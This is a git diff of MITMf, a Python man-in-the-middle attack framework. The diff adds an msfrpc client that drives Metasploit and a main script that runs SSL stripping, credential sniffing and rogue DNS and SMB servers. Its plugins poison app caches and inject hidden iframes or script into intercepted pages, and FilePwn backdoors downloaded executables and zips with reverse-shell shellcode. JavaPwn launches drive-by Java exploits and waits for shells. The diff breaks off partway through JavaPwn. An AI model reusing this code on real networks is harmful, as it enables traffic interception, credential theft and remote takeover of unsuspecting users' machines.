headers.setRawHeaders("Last-Modified",["Mon, 29 Jun 1998 02:28:12 GMT"]) # it was modifed long ago, so is most likely fresh
in_ten_years = date.fromtimestamp(time.time() + ten_years)
headers.setRawHeaders("Expires",[in_ten_years.strftime("%a, %d %b %Y %H:%M:%S GMT")])
def removeDangerousHeaders(self, headers):
headers.removeHeader("X-Frame-Options")
def getSpoofedManifest(self, url, section):
p = self.getTemplatePrefix(section)
if not os.path.exists(p+'.manifest'):
p = self.getDefaultTemplatePrefix()
f = open(p + '.manifest', 'r')
manifest = f.read()
f.close()
return self.decorate(manifest, section)
def decorate(self, content, section):
for i in section:
content = content.replace("%%"+i+"%%", section[i])
return content
def getTemplatePrefix(self, section):
if section.has_key('templates'):
return self.config['templates_path'] + '/' + section['templates']
return self.getDefaultTemplatePrefix()
def getDefaultTemplatePrefix(self):
return self.config['templates_path'] + '/default'
def getManifestUrl(self, section):
return section.get("manifest_url",'/robots.txt')
def getSectionForUrls(self, urls):
for url in urls:
for i in self.config:
if isinstance(self.config[i], dict): #section
section = self.config[i]
if section.get('tamper_url',False) == url:
return (section, 'tamper',url)
if section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url):
return (section, 'tamper',url)
if section.get('manifest_url',False) == url:
return (section, 'manifest',url)
if section.get('raw_url',False) == url:
return (section, 'raw',url)
return (False,'',urls.copy().pop())

@ -1 +0,0 @@
Subproject commit d2f352139f23ed642fa174211eddefb95e6a8586

88
libs/msfrpc.py Normal file
View file

@ -0,0 +1,88 @@
#! /usr/bin/env python
# MSF-RPC - A Python library to facilitate MSG-RPC communication with Metasploit
# Ryan Linn - RLinn@trustwave.com, Marcello Salvati - byt3bl33d3r@gmail.com
# Copyright (C) 2011 Trustwave
# This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
# You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>.
import requests
import msgpack
class Msfrpc:
class MsfError(Exception):
def __init__(self,msg):
self.msg = msg
def __str__(self):
return repr(self.msg)
class MsfAuthError(MsfError):
def __init__(self,msg):
self.msg = msg
def __init__(self,opts=[]):
self.host = opts.get('host') or "127.0.0.1"
self.port = opts.get('port') or "55552"
self.uri = opts.get('uri') or "/api/"
self.ssl = opts.get('ssl') or False
self.token = None
self.headers = {"Content-type" : "binary/message-pack"}
def encode(self, data):
return msgpack.packb(data)
def decode(self, data):
return msgpack.unpackb(data)
def call(self, method, opts=[]):
if method != 'auth.login':
if self.token == None:
raise self.MsfAuthError("MsfRPC: Not Authenticated")
if method != "auth.login":
opts.insert(0, self.token)
if self.ssl == True:
url = "https://%s:%s%s" % (self.host, self.port, self.uri)
else:
url = "http://%s:%s%s" % (self.host, self.port, self.uri)
opts.insert(0, method)
payload = self.encode(opts)
r = requests.post(url, data=payload, headers=self.headers)
opts[:] = [] #Clear opts list
return self.decode(r.content)
def login(self, user, password):
auth = self.call("auth.login", [user, password])
try:
if auth['result'] == 'success':
self.token = auth['token']
return True
except:
raise self.MsfAuthError("MsfRPC: Authentication failed")
if __name__ == '__main__':
# Create a new instance of the Msfrpc client with the default options
client = Msfrpc({})
# Login to the msfmsg server using the password "abc123"
client.login('msf','abc123')
# Get a list of the exploits from the server
mod = client.call('module.exploits')
# Grab the first item from the modules value of the returned dict
print "Compatible payloads for : %s\n" % mod['modules'][0]
# Get the list of compatible payloads for the first option
ret = client.call('module.compatible_payloads',[mod['modules'][0]])
for i in (ret.get('payloads')):
print "\t%s" % i

BIN
lock.ico

Binary file not shown.

Before

Width:  |  Height:  |  Size: 558 B

After

Width:  |  Height:  |  Size: 1.1 KiB

Before After
Before After

5
logs/.gitignore vendored
View file

@ -1,5 +0,0 @@
*
!.gitignore
!responder/
!dns/
!ferret-ng/

2
logs/dns/.gitignore vendored
View file

@ -1,2 +0,0 @@
*
!.gitignore

View file

@ -1,2 +0,0 @@
*
!.gitignore

View file

@ -1,2 +0,0 @@
*
!.gitignore

245
mitmf.py
View file

@ -1,183 +1,94 @@
#!/usr/bin/env python2.7
#!/usr/bin/env python
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
logging.getLogger("requests").setLevel(logging.WARNING) #Disables "Starting new HTTP Connection (1)" log message
import argparse
import sys
import os
import threading
import core.responder.settings as settings
from argparse import RawTextHelpFormatter
from twisted.web import http
from twisted.internet import reactor
from core.logger import logger
from core.banners import get_banner
from sslstrip.StrippingProxy import StrippingProxy
from sslstrip.URLMonitor import URLMonitor
from sslstrip.CookieCleaner import CookieCleaner
from sslstrip.ProxyPlugins import ProxyPlugins
import sys, logging, traceback, string, os
import argparse
from plugins import *
plugin_classes = plugin.Plugin.__subclasses__()
print get_banner()
mitmf_version = "0.5"
sslstrip_version = "0.9"
sergio_version = "0.2.1"
mitmf_version = '0.9.8'
mitmf_codename = 'The Dark Side'
if __name__ == "__main__":
if os.geteuid() != 0:
sys.exit("[-] The derp is strong with this one\nTIP: you may run MITMf as root.")
parser = argparse.ArgumentParser(description="MITMf v%s - Framework for MITM attacks" % mitmf_version,epilog="Use wisely, young Padawan.",fromfile_prefix_chars='@')
#add sslstrip options
sgroup = parser.add_argument_group("sslstrip","Options for sslstrip library")
sgroup.add_argument("-w", "--write", type=argparse.FileType('w'), metavar="filename", default=sys.stdout, help="Specify file to log to (stdout by default).")
sgroup.add_argument("--log-level", type=str,choices=['debug','info'], default="info", help="Specify a log level [default: info]")
slogopts = sgroup.add_mutually_exclusive_group()
slogopts.add_argument("-p", "--post", action="store_true",help="Log only SSL POSTs. (default)")
slogopts.add_argument("-s", "--ssl", action="store_true", help="Log all SSL traffic to and from server.")
slogopts.add_argument("-a", "--all", action="store_true", help="Log all SSL and HTTP traffic to and from server.")
sgroup.add_argument("-l", "--listen", type=int, metavar="port", default=10000, help="Port to listen on (default 10000)")
sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.")
sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.")
parser = argparse.ArgumentParser(description="MITMf v{} - '{}'".format(mitmf_version, mitmf_codename),
version="{} - '{}'".format(mitmf_version, mitmf_codename),
usage='mitmf.py -i interface [mitmf options] [plugin name] [plugin options]',
epilog="Use wisely, young Padawan.",
formatter_class=RawTextHelpFormatter)
#add MITMf options
sgroup = parser.add_argument_group("MITMf", "Options for MITMf")
sgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]")
sgroup.add_argument("-i", dest='interface', required=True, type=str, help="Interface to listen on")
sgroup.add_argument("-c", dest='configfile', metavar="CONFIG_FILE", type=str, default="./config/mitmf.conf", help="Specify config file to use")
sgroup.add_argument("-p", "--preserve-cache", action="store_true", help="Don't kill client/server caching")
sgroup.add_argument("-r", '--read-pcap', type=str, help='Parse specified pcap for credentials and exit')
sgroup.add_argument("-l", dest='listen_port', type=int, metavar="PORT", default=10000, help="Port to listen on (default 10000)")
sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.")
sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.")
sgroup.add_argument("-F", "--filter", type=str, help='Filter to apply to incoming traffic', nargs='+')
#Initialize plugins and pass them the parser NameSpace object
plugins = [plugin(parser) for plugin in plugin.Plugin.__subclasses__()]
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
#Set the log level
logger().log_level = logging.__dict__[options.log_level.upper()]
from core.logger import logger
formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("MITMf", formatter)
from core.netcreds import NetCreds
if options.read_pcap:
NetCreds().parse_pcap(options.read_pcap)
#Check to see if we supplied a valid interface, pass the IP and MAC to the NameSpace object
from core.utils import get_ip, get_mac, shutdown
options.ip = get_ip(options.interface)
options.mac = get_mac(options.interface)
settings.Config.populate(options)
log.debug("MITMf started: {}".format(sys.argv))
#Start Net-Creds
print "[*] MITMf v{} - '{}'".format(mitmf_version, mitmf_codename)
NetCreds().start(options.interface, options.ip)
print "|"
print "|_ Net-Creds v{} online".format(NetCreds.version)
from core.proxyplugins import ProxyPlugins
ProxyPlugins().all_plugins = plugins
for plugin in plugins:
#load only the plugins that have been called at the command line
if vars(options)[plugin.optname] is True:
ProxyPlugins().add_plugin(plugin)
print "|_ {} v{}".format(plugin.name, plugin.version)
if plugin.tree_info:
for line in xrange(0, len(plugin.tree_info)):
print "| |_ {}".format(plugin.tree_info.pop())
plugin.setup_logger()
plugin.initialize(options)
if plugin.tree_info:
for line in xrange(0, len(plugin.tree_info)):
print "| |_ {}".format(plugin.tree_info.pop())
plugin.start_config_watch()
if options.filter:
from core.packetfilter import PacketFilter
pfilter = PacketFilter(options.filter)
print "|_ PacketFilter online"
for filter in options.filter:
print " |_ Applying filter {} to incoming packets".format(filter)
#Initialize plugins
plugins = []
try:
pfilter.start()
except KeyboardInterrupt:
pfilter.stop()
shutdown()
for p in plugin_classes:
plugins.append(p())
except:
print "Failed to load plugin class %s" % str(p)
else:
from core.sslstrip.CookieCleaner import CookieCleaner
from core.sslstrip.StrippingProxy import StrippingProxy
from core.sslstrip.URLMonitor import URLMonitor
#Give subgroup to each plugin with options
try:
for p in plugins:
if p.desc == "":
sgroup = parser.add_argument_group("%s" % p.name,"Options for %s." % p.name)
else:
sgroup = parser.add_argument_group("%s" % p.name,p.desc)
sgroup.add_argument("--%s" % p.optname, action="store_true",help="Load plugin %s" % p.name)
if p.has_opts:
p.add_options(sgroup)
except NotImplementedError:
print "Plugin %s claimed option support, but didn't have it." % p.name
URLMonitor.getInstance().setFaviconSpoofing(options.favicon)
URLMonitor.getInstance().setCaching(options.preserve_cache)
CookieCleaner.getInstance().setEnabled(options.killsessions)
args = parser.parse_args()
strippingFactory = http.HTTPFactory(timeout=10)
strippingFactory.protocol = StrippingProxy
log_level = logging.__dict__[args.log_level.upper()]
#Start logging
logging.basicConfig(level=log_level, format="%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S", stream=args.write)
#All our options should be loaded now, pass them onto plugins
print "[*] MITMf v%s started... initializing plugins and modules" % mitmf_version
load = []
try:
for p in plugins:
if getattr(args,p.optname):
p.initialize(args)
load.append(p)
except NotImplementedError:
print "Plugin %s lacked initialize function." % p.name
reactor.listenTCP(options.listen_port, strippingFactory)
#Plugins are ready to go, start MITMf
URLMonitor.getInstance().setFaviconSpoofing(args.favicon)
CookieCleaner.getInstance().setEnabled(args.killsessions)
ProxyPlugins.getInstance().setPlugins(load)
for plugin in plugins:
if vars(options)[plugin.optname] is True:
plugin.reactor(strippingFactory)
strippingFactory = http.HTTPFactory(timeout=10)
strippingFactory.protocol = StrippingProxy
print "|_ Sergio-Proxy v0.2.1 online"
print "|_ SSLstrip v0.9 by Moxie Marlinspike online"
#Start mitmf-api
from core.mitmfapi import mitmfapi
print "|"
print "|_ MITMf-API online"
mitmfapi().start()
#Start the HTTP Server
from core.servers.HTTP import HTTP
HTTP().start()
print "|_ HTTP server online"
#Start DNSChef
from core.servers.DNS import DNSChef
DNSChef().start()
print "|_ DNSChef v{} online".format(DNSChef.version)
#Start the SMB server
from core.servers.SMB import SMB
SMB().start()
print "|_ SMB server online\n"
#start the reactor
reactor.listenTCP(args.listen, strippingFactory)
print "\n[*] sslstrip v%s by Moxie Marlinspike running..." % sslstrip_version
print "[*] sergio-proxy v%s online" % sergio_version
reactor.run()
print "\n"
shutdown()
#cleanup on exit
for p in load:
p.finish()

23
plugins/AppCachePoison.py Normal file
View file

@ -0,0 +1,23 @@
from plugins.plugin import Plugin
from sslstrip.ResponseTampererFactory import ResponseTampererFactory
import threading
class AppCachePlugin(Plugin):
name = "App Cache Poison"
optname = "app"
desc = "Performs App Cache Poisoning attacks"
has_opts = True
def initialize(self,options):
'''Called if plugin is enabled, passed the options namespace'''
self.options = options
self.config_file = options.tampercfg
if self.config_file == None:
self.config_file = "./config_files/app_cache_poison.cfg"
print "[*] App Cache Poison plugin online"
ResponseTampererFactory.buildTamperer(self.config_file)
def add_options(self, options):
options.add_argument("--tampercfg", type=file, help="Specify a config file")

106
plugins/BrowserProfiler.py Normal file

File diff suppressed because one or more lines are too long

24
plugins/CacheKill.py Normal file
View file

@ -0,0 +1,24 @@
from plugins.plugin import Plugin
class CacheKill(Plugin):
name = "CacheKill Plugin"
optname = "cachekill"
desc = "Kills page caching by modifying headers"
implements = ["handleHeader","connectionMade"]
has_opts = True
bad_headers = ['if-none-match','if-modified-since']
def add_options(self,options):
options.add_argument("--preserve-cookies", action="store_true", help="Preserve cookies (will allow caching in some situations).")
def handleHeader(self,request,key,value):
'''Handles all response headers'''
request.client.headers['Expires'] = "0"
request.client.headers['Cache-Control'] = "no-cache"
def connectionMade(self,request):
'''Handles outgoing request'''
request.headers['Pragma'] = 'no-cache'
for h in self.bad_headers:
if h in request.headers:
request.headers[h] = ""

296
plugins/FilePwn.py Normal file
View file

@ -0,0 +1,296 @@
################################################################################################
# 99.9999999% of this code is stolen from BDFProxy - https://github.com/secretsquirrel/BDFProxy
#################################################################################################
import sys, os
import pefile
import zipfile
import logging
import shutil
import random
import string
from bdfactory import pebin, elfbin
from plugins.plugin import Plugin
from tempfile import mkstemp
try:
from configobj import ConfigObj
except:
sys.exit('[-] configobj library not installed!')
class FilePwn(Plugin):
name = "FilePwn"
optname = "filepwn"
implements = ["handleResponse"]
has_opts = True
desc = "Backdoor executables being sent over http using bdfactory"
def convert_to_Bool(self, aString):
if aString.lower() == 'true':
return True
elif aString.lower() == 'false':
return False
elif aString.lower() == 'none':
return None
def initialize(self,options):
'''Called if plugin is enabled, passed the options namespace'''
self.options = options
self.filepwncfg = options.filepwncfg
if self.filepwncfg == None:
self.filepwncfg = "./config_files/filepwn.cfg"
self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload',
'application/x-msdos-program', 'binary/octet-stream']
self.zipMimeTypes = ['application/x-zip-compressed', 'application/zip']
#NOT USED NOW
#self.supportedBins = ('MZ', '7f454c46'.decode('hex'))
self.userConfig = ConfigObj(self.filepwncfg)
self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax']
self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86']
self.WindowsIntelx64 = self.userConfig['targets']['ALL']['WindowsIntelx64']
self.WindowsType = self.userConfig['targets']['ALL']['WindowsType']
self.LinuxIntelx86 = self.userConfig['targets']['ALL']['LinuxIntelx86']
self.LinuxIntelx64 = self.userConfig['targets']['ALL']['LinuxIntelx64']
self.LinuxType = self.userConfig['targets']['ALL']['LinuxType']
self.zipblacklist = self.userConfig['ZIP']['blacklist']
print "[*] FilePwn plugin online"
def binaryGrinder(self, binaryFile):
"""
Feed potential binaries into this function,
it will return the result PatchedBinary, False, or None
"""
with open(binaryFile, 'r+b') as f:
binaryTMPHandle = f.read()
binaryHeader = binaryTMPHandle[:4]
result = None
try:
if binaryHeader[:2] == 'MZ': # PE/COFF
pe = pefile.PE(data=binaryTMPHandle, fast_load=True)
magic = pe.OPTIONAL_HEADER.Magic
machineType = pe.FILE_HEADER.Machine
#update when supporting more than one arch
if (magic == int('20B', 16) and machineType == 0x8664 and
self.WindowsType.lower() in ['all', 'x64']):
add_section = False
cave_jumping = False
if self.WindowsIntelx64['PATCH_TYPE'].lower() == 'append':
add_section = True
elif self.WindowsIntelx64['PATCH_TYPE'].lower() == 'jump':
cave_jumping = True
targetFile = pebin.pebin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.WindowsIntelx64['SHELL'],
HOST=self.WindowsIntelx64['HOST'],
PORT=int(self.WindowsIntelx64['PORT']),
ADD_SECTION=add_section,
CAVE_JUMPING=cave_jumping,
IMAGE_TYPE=self.WindowsType,
PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx64['PATCH_DLL']),
SUPPLIED_SHELLCODE=self.WindowsIntelx64['SUPPLIED_SHELLCODE'],
ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx64['ZERO_CERT']),
)
result = targetFile.run_this()
elif (machineType == 0x14c and
self.WindowsType.lower() in ['all', 'x86']):
add_section = False
cave_jumping = False
#add_section wins for cave_jumping
#default is single for BDF
if self.WindowsIntelx86['PATCH_TYPE'].lower() == 'append':
add_section = True
elif self.WindowsIntelx86['PATCH_TYPE'].lower() == 'jump':
cave_jumping = True
targetFile = pebin.pebin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.WindowsIntelx86['SHELL'],
HOST=self.WindowsIntelx86['HOST'],
PORT=int(self.WindowsIntelx86['PORT']),
ADD_SECTION=add_section,
CAVE_JUMPING=cave_jumping,
IMAGE_TYPE=self.WindowsType,
PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx86['PATCH_DLL']),
SUPPLIED_SHELLCODE=self.convert_to_Bool(self.WindowsIntelx86['SUPPLIED_SHELLCODE']),
ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT'])
)
result = targetFile.run_this()
elif binaryHeader[:4].encode('hex') == '7f454c46': # ELF
targetFile = elfbin.elfbin(FILE=binaryFile, SUPPORT_CHECK=True)
targetFile.support_check()
if targetFile.class_type == 0x1:
#x86
targetFile = elfbin.elfbin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.LinuxIntelx86['SHELL'],
HOST=self.LinuxIntelx86['HOST'],
PORT=int(self.LinuxIntelx86['PORT']),
SUPPLIED_SHELLCODE=self.convert_to_Bool(self.LinuxIntelx86['SUPPLIED_SHELLCODE']),
IMAGE_TYPE=self.LinuxType
)
result = targetFile.run_this()
elif targetFile.class_type == 0x2:
#x64
targetFile = elfbin.elfbin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.LinuxIntelx64['SHELL'],
HOST=self.LinuxIntelx64['HOST'],
PORT=int(self.LinuxIntelx64['PORT']),
SUPPLIED_SHELLCODE=self.convert_to_Bool(self.LinuxIntelx64['SUPPLIED_SHELLCODE']),
IMAGE_TYPE=self.LinuxType
)
result = targetFile.run_this()
return result
except Exception as e:
logging.warning("EXCEPTION IN binaryGrinder %s", str(e))
return None
def zipGrinder(self, aZipFile):
"When called will unpack and edit a Zip File and return a zip file"
logging.info("ZipFile size: %s KB" % (len(aZipFile) / 1024))
if len(aZipFile) > int(self.userConfig['ZIP']['maxSize']):
logging.info("ZipFIle maxSize met %s" % len(aZipFile))
return aZipFile
tmpRan = ''.join(random.choice(string.ascii_lowercase + string.digits + string.ascii_uppercase) for _ in range(8))
tmpDir = '/tmp/' + tmpRan
tmpFile = '/tmp/' + tmpRan + '.zip'
os.mkdir(tmpDir)
with open(tmpFile, 'w') as f:
f.write(aZipFile)
zippyfile = zipfile.ZipFile(tmpFile, 'r')
#encryption test
try:
zippyfile.testzip()
except RuntimeError as e:
if 'encrypted' in str(e):
logging.info('Encrypted zipfile found. Not patching.')
return aZipFile
logging.info("ZipFile contents and info:")
for info in zippyfile.infolist():
logging.info("\t%s %s %s" % (info.filename, info.date_time, info.file_size))
zippyfile.extractall(tmpDir)
patchCount = 0
for info in zippyfile.infolist():
logging.info(">>> Next file in zipfile: %s" % info.filename)
if os.path.isdir(tmpDir + '/' + info.filename) is True:
logging.info('%s is a directory' % info.filename)
continue
#Check against keywords
keywordCheck = False
if type(self.zipblacklist) is str:
if self.zipblacklist.lower() in info.filename.lower():
keywordCheck = True
else:
for keyword in self.zipblacklist:
if keyword.lower() in info.filename.lower():
keywordCheck = True
continue
if keywordCheck is True:
logging.info('Zip blacklist enforced on %s' % info.filename)
continue
patchResult = self.binaryGrinder(tmpDir + '/' + info.filename)
if patchResult:
patchCount += 1
file2 = "backdoored/" + os.path.basename(info.filename)
shutil.copyfile(file2, tmpDir + '/' + info.filename)
logging.info("%s in zip patched, adding to zipfile" % info.filename)
else:
logging.info("%s patching failed. Keeping original file in zip." % info.filename)
if patchCount >= int(self.userConfig['ZIP']['patchCount']): # Make this a setting.
logging.info("Met Zip config patchCount limit.")
break
zippyfile.close()
zipResult = zipfile.ZipFile(tmpFile, 'w', zipfile.ZIP_DEFLATED)
logging.debug("Writing to zipfile: %s" % tmpFile)
for base, dirs, files in os.walk(tmpDir):
for afile in files:
filename = os.path.join(base, afile)
logging.debug('[*] Writing filename to zipfile: %s' % filename.replace(tmpDir + '/', ''))
zipResult.write(filename, arcname=filename.replace(tmpDir + '/', ''))
zipResult.close()
#clean up
shutil.rmtree(tmpDir)
with open(tmpFile, 'rb') as f:
aZipFile = f.read()
os.remove(tmpFile)
return aZipFile
def handleResponse(self,request,data):
content_header = request.client.headers['Content-Type']
if content_header in self.zipMimeTypes:
logging.info("%s Detected supported zip file type!" % request.client.getClientIP())
bd_zip = self.zipGrinder(data)
if bd_zip:
logging.info("%s Patching complete, forwarding to client" % request.client.getClientIP())
return {'request':request,'data':bd_zip}
elif content_header in self.binaryMimeTypes:
logging.info("%s Detected supported binary type!" % request.client.getClientIP())
fd, tmpFile = mkstemp()
with open(tmpFile, 'w') as f:
f.write(data)
patchb = self.binaryGrinder(tmpFile)
if patchb:
bd_binary = open("backdoored/" + os.path.basename(tmpFile), "rb").read()
os.remove('./backdoored/' + os.path.basename(tmpFile))
logging.info("%s Patching complete, forwarding to client" % request.client.getClientIP())
return {'request':request,'data':bd_binary}
else:
logging.debug("%s File is not of supported Content-Type: %s" % (request.client.getClientIP(), content_header))
return {'request':request,'data':data}
def add_options(self, options):
options.add_argument("--filepwncfg", type=file, help="Specify a config file")

117
plugins/Inject.py Normal file
View file

@ -0,0 +1,117 @@
import os,subprocess,logging,time,re
import argparse
from plugins.plugin import Plugin
from plugins.CacheKill import CacheKill
class Inject(CacheKill,Plugin):
name = "Inject"
optname = "inject"
implements = ["handleResponse","handleHeader","connectionMade"]
has_opts = True
desc = "Inject arbitrary content into HTML content"
def initialize(self,options):
'''Called if plugin is enabled, passed the options namespace'''
self.options = options
self.html_src = options.html_url
self.js_src = options.js_url
self.rate_limit = options.rate_limit
self.count_limit = options.count_limit
self.per_domain = options.per_domain
self.match_str = options.match_str
self.html_payload = options.html_payload
if self.options.preserve_cache:
self.implements.remove("handleHeader")
self.implements.remove("connectionMade")
if options.html_file != None:
self.html_payload += options.html_file.read()
self.ctable = {}
self.dtable = {}
self.count = 0
self.mime = "text/html"
print "[*] Inject plugin online"
def handleResponse(self,request,data):
#We throttle to only inject once every two seconds per client
#If you have MSF on another host, you may need to check prior to injection
#print "http://" + request.client.getRequestHostname() + request.uri
ip,hn,mime = self._get_req_info(request)
if self._should_inject(ip,hn,mime) and \
(not self.js_src==self.html_src==None or not self.html_payload==""):
data = self._insert_html(data,post=[(self.match_str,self._get_payload())])
self.ctable[ip] = time.time()
self.dtable[ip+hn] = True
self.count+=1
logging.info("%s [%s] Injected malicious html" % (request.client.getClientIP(), request.headers['host']))
return {'request':request,'data':data}
else:
return
def _get_payload(self):
return self._get_js()+self._get_iframe()+self.html_payload
def add_options(self,options):
options.add_argument("--js-url", type=str, help="Location of your (presumably) malicious Javascript.")
options.add_argument("--html-url",type=str,help="Location of your (presumably) malicious HTML. Injected via hidden iframe.")
options.add_argument("--html-payload",type=str,default="",help="String you would like to inject.")
options.add_argument("--html-file",type=argparse.FileType('r'),default=None,help="File containing code you would like to inject.")
options.add_argument("--match-str",type=str,default="</body>",help="String you would like to match and place your payload before. (</body> by default)")
options.add_argument("--per-domain",action="store_true",help="Inject once per domain per client.")
options.add_argument("--rate-limit",type=float,help="Inject once every RATE_LIMIT seconds per client.")
options.add_argument("--count-limit",type=int,help="Inject only COUNT_LIMIT times per client.")
options.add_argument("--preserve-cache",action="store_true",help="Don't kill the server/client caching.")
def _should_inject(self,ip,hn,mime):
if self.count_limit==self.rate_limit==None and not self.per_domain:
return True
if self.count_limit != None and self.count > self.count_limit:
#print "1"
return False
if self.rate_limit != None:
if ip in self.ctable and time.time()-self.ctable[ip]<self.rate_limit:
return False
if self.per_domain:
return not ip+hn in self.dtable
#print mime
return mime.find(self.mime)!=-1
def _get_req_info(self,request):
ip = request.client.getClientIP()
hn = request.client.getRequestHostname()
mime = request.client.headers['Content-Type']
return (ip,hn,mime)
def _get_iframe(self):
if self.html_src != None:
return '<iframe src="%s" height=0%% width=0%%></iframe>'%(self.html_src)
return ''
def _get_js(self):
if self.js_src != None:
return '<script type="text/javascript" src="%s"></script>'%(self.js_src)
return ''
def _insert_html(self,data,pre=[],post=[],re_flags=re.I):
'''
To use this function, simply pass a list of tuples of the form:
(string/regex_to_match,html_to_inject)
NOTE: Matching will be case insensitive unless differnt flags are given
The pre array will have the match in front of your injected code, the post
will put the match behind it.
'''
pre_regexes = [re.compile(r"(?P<match>"+i[0]+")",re_flags) for i in pre]
post_regexes = [re.compile(r"(?P<match>"+i[0]+")",re_flags) for i in post]
for i,r in enumerate(pre_regexes):
data=re.sub(r,"\g<match>"+pre[i][1],data)
for i,r in enumerate(post_regexes):
data=re.sub(r,post[i][1]+"\g<match>",data)
return data

195
plugins/JavaPwn.py Normal file
View file

@ -0,0 +1,195 @@
from plugins.plugin import Plugin
from plugins.BrowserProfiler import BrowserProfiler
from time import sleep
import libs.msfrpc as msfrpc
import string
import random
import threading
import logging
import sys, os
try:
from configobj import ConfigObj
except:
sys.exit('[-] configobj library not installed!')
class JavaPwn(BrowserProfiler, Plugin):
name = "JavaPwn"
optname = "javapwn"
desc = "Performs drive-by attacks on clients with out-of-date java browser plugins"
has_opts = True
def initialize(self, options):
'''Called if plugin is enabled, passed the options namespace'''
self.options = options
self.msfip = options.msfip
self.msfport = options.msfport
self.rpcip = options.rpcip
self.rpcpass = options.rpcpass
self.javapwncfg = options.javapwncfg
if not self.msfip:
sys.exit('[-] JavaPwn plugin requires --msfip')
if not self.javapwncfg:
self.javapwncfg = './config_files/javapwn.cfg'
self.javacfg = ConfigObj(self.javapwncfg)
self.javaVersionDic = {}
for key, value in self.javacfg.iteritems():
self.javaVersionDic[float(key)] = value
self.sploited_ips = [] # store ip of pwned or not vulnarable clients so we don't re-exploit
try:
msf = msfrpc.Msfrpc({"host" : self.rpcip}) #create an instance of msfrpc libarary
msf.login('msf', self.rpcpass)
version = msf.call('core.version')['version']
print "[*] Succesfully connected to Metasploit v%s" % version
except Exception:
sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server")
#Initialize the BrowserProfiler plugin
BrowserProfiler.initialize(self, options)
print "[*] JavaPwn plugin online"
t = threading.Thread(name='pwn', target=self.pwn, args=(msf,))
t.setDaemon(True)
t.start() #start the main thread
def rand_url(self): #generates a random url for our exploits (urls are generated with a / at the beginning)
return "/" + ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(5))
def version2float(self, version): #converts clients java version string to a float so we can compare the value to self.javaVersionDic
v = version.split(".")
return float(v[0] + "." + "".join(v[-(len(v)-1):]))
def injectWait(self, msfinstance, url, client_ip): #here we inject an iframe to trigger the exploit and check for resulting sessions
#inject iframe
logging.info("%s >> now injecting iframe to trigger exploit" % client_ip)
self.html_payload = "<iframe src='http://%s:%s%s' height=0%% width=0%%></iframe>" % (self.msfip, self.msfport, url) #temporarily changes the code that the Browserprofiler plugin injects
logging.info('%s >> waiting for ze shells, Please wait...' % client_ip)
exit = False
i = 1
while i <= 30: #wait max 60 seconds for a new shell
if exit == True:
break
shell = msfinstance.call('session.list') #poll metasploit every 2 seconds for new sessions
if len(shell) > 0:
for k,v in shell.items():
if client_ip in shell[k]['tunnel_peer']: #make sure the shell actually came from the ip that we targeted
logging.info("%s >> Got shell!" % client_ip)
self.sploited_ips.append(client_ip) #target successfuly exploited
exit = True
break
sleep(2)
i+=1
if exit == False: #We didn't get a shell
logging.info("%s >> session not established after 30 seconds" % client_ip)
self.html_payload = self.get_payload() # restart the BrowserProfiler plugin
def pwn(self, msfinstance):
while True:
if (len(self.dic_output) > 0) and self.dic_output['java_installed'] == '1': #only choose clients that we are 100% sure have the java plugin installed and enabled
brwprofile = self.dic_output #self.dic_output is the output of the BrowserProfiler plugin in a dictionary format
if brwprofile['ip'] not in self.sploited_ips: #continue only if the ip has not been already exploited
vic_ip = brwprofile['ip']
client_version = self.version2float(brwprofile['java_version']) #convert the clients java string version to a float
logging.info("%s >> client has java version %s installed! Proceeding..." % (vic_ip, brwprofile['java_version']))
logging.info("%s >> Choosing exploit based on version string" % vic_ip)
min_version = min(self.javaVersionDic, key=lambda x: abs(x-client_version)) #retrives the exploit with minimum distance from the clients version
if client_version < min_version: #since the two version strings are now floats we can use the < operand
exploit = self.javaVersionDic[min_version] #get the exploit string for that version
logging.info("%s >> client is vulnerable to %s!" % (vic_ip, exploit))
msf = msfinstance
#here we check to see if we already set up the exploit to avoid creating new jobs for no reason
jobs = msf.call('job.list') #get running jobs
if len(jobs) > 0:
for k,v in jobs.items():
info = msf.call('job.info', [k])
if exploit in info['name']:
